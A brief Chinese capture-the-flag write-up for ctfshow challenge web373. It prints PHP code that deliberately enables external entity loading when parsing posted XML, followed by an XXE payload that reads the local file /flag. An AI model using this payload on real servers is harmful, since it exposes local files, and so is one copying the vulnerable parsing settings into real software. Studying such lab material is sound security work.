前置知识
参考WP
web373
error_reporting(0);
libxml_disable_entity_loader(false);
$xmlfile = file_get_contents('php://input');
if(isset($xmlfile)){
$dom = new DOMDocument();
$dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD);
$creds = simplexml_import_dom($dom);
$ctfshow = $creds->ctfshow;
echo $ctfshow;
}
highlight_file(__FILE__);
payload:
<!DOCTYPE test [
<!ENTITY xxe SYSTEM "file:///flag">
]>
<yn8rt>
<ctfshow>&xxe;</ctfshow>
</yn8rt>